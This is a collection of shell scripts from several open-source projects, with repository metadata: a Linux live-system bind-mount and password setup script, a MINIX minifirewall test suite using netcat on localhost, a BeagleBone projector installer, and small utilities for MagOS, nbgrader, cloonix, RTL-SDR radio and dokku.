error "Invalid zoneinfo file: $real_zone"
return
fi
local orig_tz=$(cat $tz_file 2>/dev/null)
# If the timezone is already set to what we want then do nothing
if [ "$tz" = "$orig_tz" ]; then
return
fi
local tz_dir=$work_dir/tz
local etc_dir=$tz_dir/etc
mkdir -p $etc_dir
# Always bindmount the timezone file (when needed)
echo "$tz" > $etc_dir/timezone
# If localtime is a real file then do the bindmount trick
if ! test -L $local_file; then
cp $local_file $etc_dir/localtime
fi
bind_mount_template "$tz_dir" "$BIND_ROOT" "$REAL_ROOT"
}
do_status() {
local conf_file=$1
echo "$ME status:"
if ! read_conf_file $conf_file force; then
echo " unstarted"
exit 0
fi
echo " started"
if ! test -d $BIND_ROOT; then
echo " BIND_ROOT: $BIND_ROOT is not a directory"
elif is_mounted $BIND_ROOT; then
echo " BIND_ROOT: $BIND_ROOT is mounted"
else
echo " BIND_ROOT: $BIND_ROOT is not mounted"
fi
echo
echo " Config file:"
echo ">>>>>>>>>>"
cat $conf_file
echo "<<<<<<<<<<"
[ "$VERBOSE" ] || exit 0
echo
echo ">> df -a | grep $BIND_ROOT | awk '{print \$6}'"
df -a | grep $BIND_ROOT | awk '{print $6}'
exit 0
}
do_adjtime() {
local conf_file=$1 work_dir=$2
read_conf_file $conf_file
local orig_file=/etc/adjtime
test -r $orig_file || return 0
local template_dir=$work_dir/adjtime
local targ_file=$template_dir$orig_file
mkdir -p $(dirname $targ_file)
cp $orig_file $targ_file
sed -i -e "1 s/.*/0.0 0 0.0/" -e "2 s/.*/0/" $targ_file
bind_mount_template "$template_dir" "$BIND_ROOT" "$REAL_ROOT"
}
do_passwd() {
local conf_file=$1
read_conf_file $conf_file
munge_files "$TEMPLATE_DIR" "$BIND_ROOT" "$WORK_DIR" "$USER_PW" "$ROOT_PW"
write_conf_file $CONF_FILE
}
do_live_files() {
local conf_file=$1 work_dir=$2
_do_files $conf_file $work_dir $TEMPLATE_DIR/files $work_dir/live-files
}
do_general_files() {
local conf_file=$1 work_dir=$2
_do_files $conf_file $work_dir $TEMPLATE_DIR/general-files $work_dir/general-files
}
_do_files() {
local conf_file=$1 work_dir=$2 from=$3 temp=$4
read_conf_file $conf_file
test -d $from || fatal "Directory $from does not exist"
mkdir -p $temp || fatal "Could not mkdir -p $temp"
cp -r $from/* $temp/ 2>/dev/null
bind_mount_template "$temp" "$BIND_ROOT" "$REAL_ROOT"
write_conf_file $CONF_FILE
}
do_all_files() {
do_live_files "$@"
do_general_files "$@"
}
#------------------------------------------------------------------------------
# This is a catch-all for doing the normal things we usually want to do. As
# more nooks and crannies are discovered they are usually added here and the
# callers don't have to change anything.
#------------------------------------------------------------------------------
do_general() {
local conf_file=$1 work_dir=$2
do_empty $conf_file $work_dir "/etc/modprobe.d"
do_empty $conf_file $work_dir "/etc/grub.d"
do_empty $conf_file $work_dir "/etc/network/interfaces.d"
do_all_files $conf_file $work_dir
do_passwd $conf_file
do_repo $conf_file $work_dir $DEF_REPO
do_timezone $conf_file $work_dir $DEF_TZ
write_conf_file $conf_file
}
#------------------------------------------------------------------------------
# Try to put the system back into the same state it was in before we started.
#------------------------------------------------------------------------------
do_cleanup() {
local conf_file=$1 work_dir=$2
read_conf_file $conf_file $FORCE
is_mounted $BIND_ROOT &>/dev/null && pretend umount --recursive $BIND_ROOT
# We MUST umount before we remove files and directories because otherwise
# we would be trying to remove mountpoints which the system does not like
# the recursive umount may be imperfect but we only need a few iterations
# to get it all umounted.
local i
for i in $(seq 1 10); do
is_mounted $BIND_ROOT &>/dev/null || break
pretend umount --recursive $BIND_ROOT
[ "$PRETEND" ] && break
sleep 0.1
done
[ -z "$PRETEND" ] && is_mounted $BIND_ROOT &>/dev/null && fatal "Could not umount $BIND_DIR"
test -d $BIND_ROOT && pretend rmdir $BIND_ROOT
# Remove files that we touched on the root file system
local file dir
echo "$RM_FILES" | tr ',' '\n' | tac | while read file; do
[ "$file" ] || continue
pretend rm -f "$file"
done
# removed directories we created on the root file system
echo "$RM_DIRS" | tr ',' '\n' | tac | while read dir; do
[ "$dir" ] || continue
pretend rmdir --ignore-fail-on-non-empty --parents "$dir"
done
# Finally, clean up our working directory
pretend rm -f $conf_file
[ "$work_dir" ] && pretend rm -rf $work_dir
exit 0
}
#------------------------------------------------------------------------------
# This is a central routine. We bind mount every file that is in the template
# directory to the equivalent location under the bind root. We may have to
# make directories and touch files to do this so in those cases we record the
# location of the created file or directory on the real file system so we can
# clean them up after we are done and after the bind root was unmounted.
#------------------------------------------------------------------------------
bind_mount_template() {
local template_dir=${1%/} bind_root=${2%/} real_root=${3%/}
test -d $template_dir || return
local file
while read file; do
local base=${file#$template_dir}
local targ=$bind_root$base
local orig=$real_root$base
if test -L "$file"; then
# Symlinks -- can't bind mount them
# don't do anything if the orig already exists
test -e "$orig" && continue
# Otherwise, copy our symlimk to the real file system ...
pretend cp -a "$file" "$orig"
[ "$PRETEND" ] && continue
# Don't add broken links
if test -e $(readlink -f "$orig"); then
# .. and either delete it when we are done
RM_FILES="$RM_FILES${RM_FILES:+,}$orig"
else
# ... or delete it now if it is broken
pretend rm -f "$orig"
fi
else
# Can't bind mount to a symlink
if test -L "$orig"; then
error "Won't bind mount symlink: $orig"
continue
fi
# Normal files -- bind mount template file, mkdir and touch if needed
touch_file "$targ" "$orig"
is_mounted "$targ" && error "File $targ is already mounted"
pretend mount --bind "$file" "$targ"
fi
done <<Bind_Template
$(find $template_dir -type f -o -type l)
Bind_Template
}
#------------------------------------------------------------------------------
# "Clear out" existing directories by bind mounting an empty directory over
# them. We have to create a different empty directory for each directory we
# want to clear in case we want to populate some of the empty directories
# with files.
#------------------------------------------------------------------------------
bind_empty_dirs() {
local template_dir=${1%/} bind_root=${2%/} real_root=${3%/} dirs=$4
local base
echo "$dirs" | tr ',' '\n' | tac | while read base; do
[ "$base" ] || continue
local targ=$bind_root/$base
# If directory doesn't exist then skip it
test -d "$targ" || continue
make_dir "$targ" "$real_root/$base"
pretend mkdir -p "$template_dir/$base"
pretend mount --bind "$template_dir/$base" "$targ"
done
}
#------------------------------------------------------------------------------
# If a directory we need doesn't exist then create it and mark the *original*
# (under the real root) to be removed when we are done. We need to remove the
# original because the bind root will already be unmounted. Only mark the
# original for deletion if it doesn't already exist.
#------------------------------------------------------------------------------
make_dir() {
local dir=$1 orig=$2
test -d "$dir" && return
test -d "$orig" || RM_DIRS="$RM_DIRS${RM_DIRS:+,}$orig"
pretend mkdir -p "$dir"
}
#------------------------------------------------------------------------------
# If a file doesn't exist then touch it so we can bind mount a template file
# over it. Mark the original (under the real root) for deletion if it doesn't
# already exist.
#------------------------------------------------------------------------------
touch_file() {
local file=$1 orig=$2
local dir=$(dirname $file)
make_dir "$dir" "$(dirname $orig)"
test -f $file && return
test -e $file && fatal "Expected a plain file at $orig"
test -e "$orig" || RM_FILES="$RM_FILES${RM_FILES:+,}$orig"
pretend touch $file
}
#------------------------------------------------------------------------------
#
#------------------------------------------------------------------------------
munge_files() {
local template_dir=$1 bind_root=$2 work_dir=$3 user_pw=${4:-demo} root_pw=${5:-root}
local bind_from=$work_dir/bind
local def_user=${user_pw%%:*}
local empty_dir=$work_dir/empty
mkdir -p $empty_dir
# create lists of pw_files and grp_files that actually exist
local file pw_files grp_files
for file in $PW_FILES; do
test -e $bind_root$file || continue
pw_files="$pw_files $bind_from$file"
case $file in
*/group|*/gshadow) grp_files="$grp_files $bind_from$file";;
esac
done
# Ensure we have a user with uid=1000 in the real system
local added_user
local user_1000=$(cut -d: -f1,3 /etc/passwd | grep :1000$ | cut -d: -f1)
if [ -z "$user_1000" ]; then
# Don't assume there is no demo user but still try it first
user_1000=$def_user
while grep -q "^$user_1000:" /etc/passwd; do
user_1000=a$(dd if=/dev/urandom bs=1 count=40 2>/dev/null | md5sum | cut -c 1-9)
done
adduser --disabled-login --uid=1000 --no-create-home --gecos $def_user $user_1000
added_user=true
fi
# Copy in files to the bind_from *after* we've added user_1000 (if needed)
# Use files from template_dir first if they are available.
local live_files
for file in $BIND_FILES; do
test -e $bind_root$file || continue
dir=$(dirname $file)
bdir=$bind_from$dir
# Don't munge files that have a template file
[ "$template_dir" -a -e $template_dir$file ] && continue
pretend mkdir -p $bdir
# Probably makes no difference that we copy from bind_root, not real_root
pretend cp -a $bind_root$file $bdir
done
# Remove the added user from the originals (but it is still in the copies
# under bind_from/)
[ "$added_user" ] && deluser $user_1000
# Modify files (under bind_from/)
# Remove all other normal users from the passwd and group files
# Normal means having a home dir under /home and a login shell that ends in "sh"
local other_users=$(cut /etc/passwd -d: -f1,6,7 | grep ":/home/.*:.*sh$" | cut -d: -f1 \
| grep -v "^$user_1000$")
local other_user_regex=$(echo $other_users | tr " " '|')
pretend sed -i -r "/^($other_user_regex):/d" $pw_files
pretend sed -i -r -e "s/:($other_user_regex)(,|$)/:/" -e "s/,($other_user_regex)(,|$)/\2/" $grp_files
# Replace user_1000 with def_user (demo) if needed
if [ $user_1000 != $def_user ]; then
pretend sed -i -r "s/^$user_1000:/$def_user:/" $pw_files
pretend sed -i -r -e "s/:$user_1000(,|$)/:$def_user/" -e "s/,$user_1000(,|$)/,$def_user\1/" $grp_files
fi
update_home $def_user /home/$def_user $bind_from
set_password $user_pw $bind_from
set_password $root_pw $bind_from
# Bind mount files under $bind_from/
for file in $BIND_FILES; do
local from=$bind_from$file
local to=$bind_root$file
test -e $from || continue
is_mounted $to && error "File $to is already mounted"
pretend mount --bind $from $to
done
}
# Note: this code is no longer called/used. We use fresh copies which
# a lot of problems. Although we will need to call it if the name of
# the default user changes.
do_xorg_login() {
exit 10
do_sed $bind_from/etc/slim.conf \
-e "s/^(\s#)*(default_user +).*/\2$def_user/" \
-e "/xserver_arguments/ s/ -dpi\s+[0-9]+//" \
-e "s/^(\s#)*(auto_login +).*/\2yes/"
do_sed $bind_from/etc/lightdm/lightdm.conf \
-e "/autologin-user=demo/ s/^#+//" \
-e "/xserver-command/ s/ -dpi [0-9]+//"
}
do_sed() {
local file=$1
shift
echo sed $* $file
if [ "$PRETEND" ]; then
local expr
file=${file/$bind_from/$real_root}
test -e $file || return
for expr; do
[ "$expr" = -e ] && continue
echo sed -n -r "${expr}" $file
sed -n -r "${expr}p" $file
done
else
test -e $file || return
pretend sed -i -r "$@" $file
fi
}
# first param is "username=password" and the "=password" part is optional
# If the password is empty then we use the username for the password.
# Second param is a "chroot" directory containing the /etc/shadow file.
set_password() {
local user_pw=$1 dir=$2
local user=${user_pw%%:*}
local pw=${user_pw#*:}
: ${pw:=$user}
local hash=$(mkpasswd -m sha-512 "$pw")
pretend sed -i -r "s=^($user):[^:]*:=\1:$hash:=" $dir/etc/shadow
}
update_home() {
local user=$1 home=$2 dir=$3
pretend sed -i -r "s=^($user:[^:]*:[^:]*:[^:]*:[^:]*:)[^:]*=\1$home=" $dir/etc/passwd
}
write_conf_file() {
local file=$1
mkdir -p $(dirname $file)
cat <<Conf_File > $file
REAL_ROOT="$REAL_ROOT"
BIND_ROOT="$BIND_ROOT"
RM_DIRS="$RM_DIRS"
RM_FILES="$RM_FILES"
Conf_File
}
read_conf_file() {
local conf_file=$1 force=$2
if ! test -r $conf_file; then
[ "$force" ] || fatal "Could not find config file $conf_file"
return 1
fi
. $conf_file
return 0
}
make_real() {
local file=$1
test -L $file || return
local dest=$(readlink -f $file)
test -f "$dest" || return
local tmp=$(mktemp $file.XXXXXXXX)
cp $dest $tmp
mv $tmp $file
}
random_hex_32() {
dd if=/dev/urandom bs=1 count=40 2>/dev/null | md5sum | cut -d" " -f1
}
version_id() {
echo "==== $(random_hex_32)"
}
fatal() {
local msg=$1 ret=${2:-2}
echo -e "$ME Fatal Error: $msg" >&2
exit $ret
}
error() {
local msg=$1
echo -e "$ME Error: $msg" >&2
}
is_mounted() {
local file=$1
cut -d" " -f2 /proc/mounts | grep -q "^$(readlink -f $file)$"
return $?
}
pretend() {
[ "$PRETEND" -o "$VERBOSE" ] && echo "$@"
[ "$PRETEND" ] && return
"$@"
}
main "$@"
| true
|
10f08a3a183c68d56820ce408151ae006265967a
|
Shell
|
magos-linux/magos-linux
|
/make_modules/add-modules/files/patches/rootfs/rootfs/usr/lib/magos/scripts/save2module
|
UTF-8
| 1,168
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/bash
path=/mnt/livemedia/MagOS/modules
cat /mnt/live/etc/modules | grep -q MagOS-Data && path=/mnt/livemedia/MagOS-Data/modules
zcat /proc/config.gz | grep -q SQUASHFS_XZ && MODULEFORMAT=xzm || MODULEFORMAT=lzm
ENABLE()
{
sed -i '/^SAVETOMODULE.*/d' /etc/sysconfig/MagOS
echo "SAVETOMODULE=yes" >> /etc/sysconfig/MagOS
SAVETOMODULENAME="$2"
[ "${2}_" == "_" ] && SAVETOMODULENAME="$path/zz-save-$(date +%F_%H-%M).$MODULEFORMAT"
echo "SAVETOMODULENAME=$SAVETOMODULENAME" >> /etc/sysconfig/MagOS
}
DISABLE()
{
sed -i '/^SAVETOMODULE.*/d' /etc/sysconfig/MagOS
}
STATUS()
{
. /etc/sysconfig/MagOS
status=disabled
[ "$SAVETOMODULE" = "yes" ] && status=enabled
[ "$SAVETOMODULENAME" = "" ] && SAVETOMODULENAME=/mnt/livemedia/MagOS/optional/zz-save.$MODULEFORMAT
echo "$status $SAVETOMODULENAME"
}
HELP()
{
cat <<EOF
Script to control SAVETOMODULE mode
Usage:
--enable </path/file.$MODULEFORMAT>
--disable
--status
--help
EOF
}
cmd=$1
[ "$cmd" = "" ] && cmd="--status"
case $cmd in
-h | --help )
HELP ;;
--status )
STATUS ;;
--enable )
ENABLE $@ ;;
--disable )
DISABLE ;;
esac
exit 0
| true
|
c761b5c743e22e91040243935904c88f8130af05
|
Shell
|
jgwerner/morehouse-outreach-notebook
|
/illumidesk-notebook/enable_extensions.sh
|
UTF-8
| 1,114
| 2.953125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
install_instructor_extensions() (
jupyter serverextension enable --sys-prefix nbgrader.server_extensions.assignment_list
jupyter serverextension enable --sys-prefix nbgrader.server_extensions.course_list
jupyter serverextension enable --sys-prefix async_nbgrader
jupyter nbextension enable --sys-prefix course_list/main --section=tree
jupyter nbextension enable --sys-prefix assignment_list/main --section=tree
jupyter nbextension enable --sys-prefix --py async_nbgrader/common
)
install_student_extensions() (
jupyter serverextension enable --sys-prefix nbgrader.server_extensions.assignment_list
jupyter nbextension enable --sys-prefix assignment_list/main --section=tree
)
if [[ "${USER_ROLE}" == "Instructor" ]] || [[ "${USER_ROLE}" == "TeachingAssistant" ]]; then
echo "Enabling nbgrader extensions for Instructor or TeachingAssistant role"
install_instructor_extensions
fi
if [[ "${USER_ROLE}" == "Student" ]] || [[ "${USER_ROLE}" == "Learner" ]]; then
echo "Enabling nbgrader extensions for Student/Learner role"
install_student_extensions
fi
| true
|
4e31eaa97d659188932ba71aee1e44dcfe2f53ad
|
Shell
|
ArtemSharypov/4580-research-project
|
/firewallTestOut.sh
|
UTF-8
| 7,485
| 3.25
| 3
|
[] |
no_license
|
#!/bin/sh
# Run the minifirewall test suite
# Test print minifirewall
readonly TEST_PATH=/usr/src/minix/commands/minifirewall/testResults/testTerminalOutputOut.txt
readonly EXTRA_LOGS=/usr/src/minix/commands/minifirewall/testResults/extraLogs.txt
rm $TEST_PATH
rm $EXTRA_LOGS
###############################################################################################
print_result() {
if [ $? == 0 ]; then
printf "Successful connection attempt, there was no block\n" &>> $TEST_PATH
else
printf "Failed to connect, likely due to a block...that darn firewall\n" &>> $TEST_PATH
fi
}
###############################################################################################
echo "---------------------------------------------------------------------------"
printf "Testing traffic manipulation of outgoing packets\n" &>> $TEST_PATH
printf "\n\n" &>> $TEST_PATH
echo "Test minifirewall policy Blocks OUT" &>> $TEST_PATH
echo "----------------------------------" &>> $TEST_PATH
# Test #1
printf "\nTest #1 TCP block outgoing \n" 2>&1 | tee -a $TEST_PATH
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 localhost 80) | nc -w 10 -l -p 80 &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --out --proto TCP --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --proto TCP --action BLOCK
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 localhost 80) | nc -w 10 -l -p 80 &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #2
printf "\nTest #2 UDP block outgoing \n" 2>&1 | tee -a $TEST_PATH
printf "\n Progress...................64/100\n"
(sleep 5; echo "Succesfully Recieved the message" | nc -u -w 1 localhost 80) | nc -w 10 -u -l -p 80 &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --out --proto UDP --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --proto UDP --action BLOCK
(sleep 5; echo "Succesfully Recieved the message" | nc -u -w 1 localhost 80) | nc -w 10 -u -l -p 80 $>> $EXTRA_LOGS
print_result
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #3
printf "\nTest #3 ICMP block outgoing \n" 2>&1 | tee -a $TEST_PATH
ping -c 1 localhost &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --out --proto IDMP --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --proto ICMP --action BLOCK
ping -c 1 localhost &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #4
printf "\nTest #4 Block ALL outgoing \n" 2>&1 | tee -a $TEST_PATH
ping -c 1 localhost &>> $EXTRA_LOGS
printf "\nminifirewall --out --proto ALL --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --proto ALL --action BLOCK
ping -c 1 localhost &>> $EXTRA_LOGS
print_result
(sleep 5; echo "Succesfully Recieved the message" | nc -u -w 1 localhost 80) | nc -w 10 -u -l -p 80 $>> $EXTRA_LOGS
print_result
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 localhost 80) | nc -w 10 -l -p 80 &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #5
printf "\nTest #5 Test blockage of outgoing source IP Address \n" 2>&1 | tee -a $TEST_PATH
printf "\n Progress...................77/100\n"
ping -c 1 10.0.2.15 &>> $TEST_PATH
printf "\nminifirewall --out --srcip 10.0.2.15 --proto ALL --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --srcip 10.0.2.15 --proto ALL --action BLOCK &>> $TEST_PATH
ping -c 1 10.0.2.15 &>> $TEST_PATH
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #6
printf "\nTest #6 Test blockage of outgoing destination IP Address \n" 2>&1 | tee -a $TEST_PATH
printf "\nminifirewall --out --destip 127.0.0.1 --proto TCP --destport 80 --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --destip 127.0.0.1 --proto TCP --destport 80 --action BLOCK &>> $TEST_PATH
printf "\nBlocked port: \n" &>> $TEST_PATH
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 127.0.0.1 80) | nc -w 10 -l -p 80 &>> $TEST_PATH
print_result
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #7
printf "\nTest #7 Block outgoing packets if directed at specific port \n" 2>&1 | tee -a $TEST_PATH
printf "\n Progress...................84/100\n"
printf "\nminifirewall --out --srcip 10.0.2.15 --proto TCP --destport 80 --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --srcip 10.0.2.15 --proto TCP --destport 80 --action BLOCK &>> $TEST_PATH
printf "\nBlocked port: \n" &>> $TEST_PATH
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 127.0.0.1 80) | nc -w 10 -l -p 80 &>> $TEST_PATH
print_result
printf "Using alternative port we get: " &>> $TEST_PATH
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 127.0.0.1 90) | nc -w 10 -l -p 90 &>> $TEST_PATH
print_result
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #8
printf "\nTest #8 Test blockage of outgoing masked IP Address \n" 2>&1 | tee -a $TEST_PATH
printf "\n Progress...................88/100\n"
ping -c 1 255.255.255.255 &>> $TEST_PATH
printf "\nminifirewall --out --srcip 10.0.2.15 --srcnetmask 255.255.255.255 --proto ALL --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --srcip 10.0.2.15 --srcnetmask 255.255.255.255 --proto ALL --action BLOCK &>> $TEST_PATH
ping -c 1 255.255.255.255 &>> $TEST_PATH
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
# Test #9
printf "\nTest #9 Test Unblock outgoing policy \n" 2>&1 | tee -a $TEST_PATH
printf "\n Progress...................95/100\n"
printf "\nminifirewall --out --proto TCP --action BLOCK\n" &>> $TEST_PATH
minifirewall --out --proto TCP --action BLOCK &>> $TEST_PATH
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 127.0.0.1 80) | nc -w 10 -l -p 80 &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --out --proto TCP --action UNBLOCK\n" &>> $TEST_PATH
minifirewall --out --proto TCP --action UNBLOCK &>> $TEST_PATH
(sleep 5; echo "Succesfully Recieved the TCP message" | nc -w 1 127.0.0.1 80) | nc -w 10 -l -p 80 &>> $EXTRA_LOGS
print_result
printf "\nminifirewall --delete 2\n" &>> $TEST_PATH
minifirewall --delete 2 &>> $TEST_PATH
printf "\nminifirewall --delete 1\n" &>> $TEST_PATH
minifirewall --delete 1 &>> $TEST_PATH
###############################################################################################
printf "\n Progress...................100/100\n"
printf "\n\n\n" &>> $TEST_PATH
printf "\n Output tests completed view in /testResults/testTerminalOutputOut.txt\n"
printf "\n All tests completed thank you for your patience! :)\n"
| true
|
1797fe070871366a39d9987f98503217faa6c2b5
|
Shell
|
dlp-keynote/LC4500_PEM
|
/pem_install.sh
|
UTF-8
| 4,047
| 3.6875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Last update: 11/30/2015
#
# This script is designed to be ran on the BB from the directory where the install files are located.
# This means that the user has already pulled a copy of the install files (including this script)
# onto the BB either through git or some other means.
#
#
# This script requires superuser priveleges (default) for some operations.
#
# It should be ran on a clean Debian build (Debian Image 2015-03-01 was used originally).
#
# When run, it will perform several "install" operations for the following components:
# - Links will be created for the startup script using update-rc.d command in /etc/init.d/lc4500_startup.sh
# - compile the cape manager overlays (DTS) into DTBO files and place them into the cape manager folder
# - update apt-get and install various libraries required by the application
#
#
cur_dir=`pwd`
echo ========= Installing Startup Script and app ==========
# Now fix startup sequence
echo "Updating Boot-up scripts...."
cd /etc/init.d
# remove old startup scripts so we can rearrange them
sudo update-rc.d apache2 remove
sudo update-rc.d xrdp remove
# copy new versions with new priorities
cp $cur_dir/StartupScripts/cron .
cp $cur_dir/StartupScripts/dbus .
cp $cur_dir/StartupScripts/rsync .
cp $cur_dir/StartupScripts/udhcpd .
cp $cur_dir/StartupScripts/lc4500-pem.sh .
sudo update-rc.d lc4500-pem.sh start 10 1 2 3 4 5 . stop 0 0 6 .
echo ========= Installing Device Tree Overlays =============
echo "Updating Device Tree Overlay files...."
cd /lib/firmware
sudo cp $cur_dir/BB-BONE-LC4500-00A0.dts .
# compile device tree overlay functions (SPI, HDMI etc.)
dtc -O dtb -o BB-BONE-LC4500-00A0.dtbo -b 0 -@ BB-BONE-LC4500-00A0.dts
echo ============= Updating the Cape Manager ================
cd /etc/default
cp $cur_dir/capemgr .
echo ============= Check uEnv.txt boot parameters ================
echo "Updating uEnv.txt file. Previous version saved in /boot/uEnv.old.txt"
cd $cur_dir
cp /boot/uEnv.txt /boot/uEnv.old.txt
cp /boot/uEnv.txt ./uEnv.old
if [ -s uEnv.old ]; then
echo "Using saved uEnv file"
cat uEnv.old | sed '/cmdline/s/quiet/quiet text/g' | sed '/BB-BONELT-HDMI,BB-BONELT-HDMIN/s/#cape_disable/cape_disable/g' | sed '/BB-BONE-EMMC-2G/s/cape_disable/#cape_disable/g' | awk '/uname/{print "optargs=\"consoleblank=0\""}1' > /boot/uEnv.txt
else
cat /boot/uEnv.txt | sed '/cmdline/s/quiet/quiet text/g' | sed '/BB-BONELT-HDMI,BB-BONELT-HDMIN/s/#cape_disable/cape_disable/g' | sed '/BB-BONE-EMMC-2G/s/cape_disable/#cape_disable/g' | awk '/uname/{print "optargs=\"consoleblank=0\""}1' > /boot/uEnv.txt
fi
echo ============= Check Network config ================
#echo Check /etc/network/interfaces to be sure the IP address is correct for this board
echo Check /etc/hostname to be sure the network name is correct:
echo "Type the new network hostname you want to use [you have 30 seconds or default will be automatically used]:"
newhostname="lc4500-pem"
read -t 30 newhostname
if [ $newhostname == ""] ; then
echo "Default network ID used: lc4500-pem. Be careful if you have multiple units on your network!"
sudo echo "lc4500-pem" > /etc/hostname
else
echo "OK, changing network ID to:" $newhostname
sudo echo $newhostname > /etc/hostname
fi
echo "Updating Debitian libraries..."
sudo apt-get update
sudo apt-get install libdrm2
sudo apt-get install libudev-dev
sudo apt-get install libdrm-dev
echo "Building PEM application..."
cd $cur_dir
#Need to add xf86drm.h and other headers to system path to build locally
cp headers/*.h /usr/include
# Build application
cd objs
make
if [ -s /etc/init.d/lc45000-pem.sh ] ; then
echo "Stopping exisitng PEM application..."
sudo service lc4500-pem.sh stop
echo "done. Copying new build"
fi
sudo cp lc4500_main /usr/bin
if [ -d /opt/lc4500pem ] ; then
echo "Solution directory exits"
else
sudo mkdir /opt/lc4500pem
fi
if [ -s /usr/bin/lc4500_main ] ; then
echo "Installation Successfull. Rebooting ..."
reboot
else
echo "Installation script failed!"
fi
| true
|
1df51904a6ee1a5783c82f3099ba05a3eefc2b21
|
Shell
|
clownix/cloonix
|
/quickstart/depends_install/depend_all.sh
|
UTF-8
| 257
| 2.90625
| 3
|
[] |
no_license
|
#/bin/bash
set -e
LIST="lunar \
jammy \
bookworm \
bullseye \
fedora38 \
fedora37 \
centos9 \
centos8 \
tumbleweed"
for i in ${LIST}; do
echo BEGIN ${i}
./${i}
echo END ${i}
sleep 5
done
| true
|
7b5550710a560e013bf77154aded2bca097c7879
|
Shell
|
GraduationProject5/pai-algorithm-server
|
/pipenv_run.sh
|
UTF-8
| 411
| 3.140625
| 3
|
[] |
no_license
|
#/bin/sh
sleepForAWhile(){
local timeNum=$1
sleep ${timeNum} &
wait
echo "SleepForAWhile is end.timeNum:${timeNum}"
}
# 算法服务器 port:14000
nohup pipenv run python manage.py runserver 0.0.0.0:14000 > server.log 2>&1 &
# 等待10s,为了使算法服务器完全启动
sleepForAWhile 12 &
# celery 多线程
nohup pipenv run celery -A pai_algorithm worker -l info > celery.log 2>&1 &
| true
|
5d1ed5a099dd429b5a0042cd34ed8d2ebc1963ce
|
Shell
|
abhishekkr/dotfiles
|
/shell_profile/a.rtlsdr.sh
|
UTF-8
| 637
| 3.0625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
### quick utils for DVB-T + DAB + FM
### Play FM Radio of provided frequency
rdo-fm-play(){
if [ $# -ne 1 ]; then echo "Usage: radio_fm <FREQ>" && return 1; fi
_FREQ=$1
rtl_fm -M wbfm -f ${_FREQ}M | play -r 32k -t raw -e signed-integer -b 16 -c 1 -V1 -
}
## Play Mumbai FM stations
fm-mumbai(){
_Frequencies=("91.1 92.7 93.5 94.3 98.3 100.7 104.0 104.8 107.1")
_Station_Names=("Radio-City BIG-FM Red-FM Radio-One Radio-Mirchi AIR-FM-Gold Fever Oye-FM AIR-FM-Rainbow")
for _FREQ in $_Frequencies; do
echo $_FREQ
done
unset _Frequencies
unset _Station_Names
unset _FREQ
}
| true
|
549b3db5ea042c855e43639138a710826bded723
|
Shell
|
gergap/tmux-imap
|
/scripts/mail_icon.sh
|
UTF-8
| 472
| 3.4375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# script local variables
new_mail_icon="✉ "
no_mail_icon="-"
print_icon() {
local status=$1
if [ "$status" == "0" ]; then
printf "$new_mail_icon($status) "
elif [ "$status" == "N/A" ]; then
printf "#[fg=red]$new_mail_icon($status) #[default]"
else
printf "#[fg=green]$new_mail_icon($status) #[default]"
fi
}
main() {
status=$(cat ~/imap-status.txt) || status="N/A"
print_icon "$status"
}
main
| true
|
b945a30d649d6d1dd069e01e12b6fd6a59f23093
|
Shell
|
broadly/dokku
|
/dokku
|
UTF-8
| 5,715
| 3.625
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -eo pipefail
shopt -s nullglob
export DOKKU_DISTRO=${DOKKU_DISTRO:="ubuntu"}
export DOKKU_IMAGE=${DOKKU_IMAGE:="progrium/buildstep"}
export DOKKU_ROOT=${DOKKU_ROOT:=~dokku}
export PLUGIN_PATH=${PLUGIN_PATH:="/var/lib/dokku/plugins"}
export DOKKU_NOT_IMPLEMENTED_EXIT=10
export DOKKU_VALID_EXIT=0
source "$PLUGIN_PATH/common/functions"
[[ -f $DOKKU_ROOT/dokkurc ]] && source $DOKKU_ROOT/dokkurc
[[ -d $DOKKU_ROOT/.dokkurc ]] && for f in $DOKKU_ROOT/.dokkurc/*; do source $f; done
[[ $DOKKU_TRACE ]] && set -x
parse_args "$@"
args=("$@")
if [[ "${args[0]}" =~ ^--.* ]]; then
for arg in "$@"; do
if [[ "$arg" =~ ^--.* ]];then
shift 1
else
break
fi
done
fi
